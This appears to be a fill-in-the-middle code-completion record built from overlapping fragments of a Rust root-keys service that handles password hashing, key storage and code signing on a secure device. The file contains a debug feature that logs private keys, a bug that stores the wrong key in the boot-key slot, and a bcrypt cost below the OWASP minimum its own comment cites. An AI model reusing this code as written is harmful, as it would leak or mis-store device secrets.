// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| debug_staging | identifier_name |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that holds all plaintext passwords, keys, and temp data. stuck in two well-defined page so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being unitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do this from to try and avoid making as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for pasing buffers around. instead, we create a single buffer, and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 |
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| {
// read until we get a buffer that's not fully filled
break;
} | conditional_block |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that holds all plaintext passwords, keys, and temp data. stuck in two well-defined page so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
